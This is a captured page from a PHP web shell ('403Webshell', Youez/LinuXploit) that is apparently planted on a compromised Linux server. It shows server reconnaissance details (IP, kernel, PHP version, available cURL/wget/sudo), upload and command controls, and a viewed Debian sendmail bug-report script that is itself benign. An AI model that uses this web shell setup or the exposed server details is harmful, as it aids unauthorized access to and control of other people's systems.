403Webshell
Server IP : 65.1.209.187  /  Your IP : 216.73.216.144
Web Server : nginx/1.24.0
System : Linux ip-172-31-5-206 6.14.0-1015-aws #15~24.04.1-Ubuntu SMP Tue Sep 23 22:44:48 UTC 2025 x86_64
User :  ( 1001)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/bug/sendmail-base/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/bug/sendmail-base/script
#!/bin/sh
#-----------------------------------------------------------------------------
# Copyright (c) 1998-2010 Richard Nelson.  All Rights Reserved.
#
#   Debian helper function script for Debian Sendmail bug reporting
#     Note: this file supports 8.15.0 - 9.0.0
#
# Notes (to all):
#   *
#
# Notes (to self):
#   *
#
#-----------------------------------------------------------------------------
#
#set -e;
DEBUG=0;

# Announce
printf "Output of $0:\n" >&3;

# Show files in /etc/mail
printf "\nls -alR /etc/mail:\n" >&3;
ls -alR /etc/mail | grep -Eve '~$' >&3;

# Extract the relevant portion of sendmail.conf
if [ -e /etc/mail/sendmail.conf ]; then
    printf "\nsendmail.conf:\n" >&3;
    grep -ve '^#' "/etc/mail/sendmail.conf" >&3;
    fi;

# Extract the relevant portion of sendmail.mc
if [ -e /etc/mail/sendmail.mc ]; then
    printf "\nsendmail.mc:\n" >&3;
    grep -Eve '^(#|dnl|$)' "/etc/mail/sendmail.mc" >&3;
    fi;

# Extract the relevant portion of submit.mc
if [ -e /etc/mail/submit.mc ]; then
    printf "\nsubmit.mc...\n" >&3;
    grep -Eve '^(#|dnl|$)' "/etc/mail/submit.mc" >&3;
    fi;

printf "\n" >&3;

# vim:set ai et sts=4 sw=4 tw=0:

Youez - 2016 - github.com/yon3zu
LinuXploit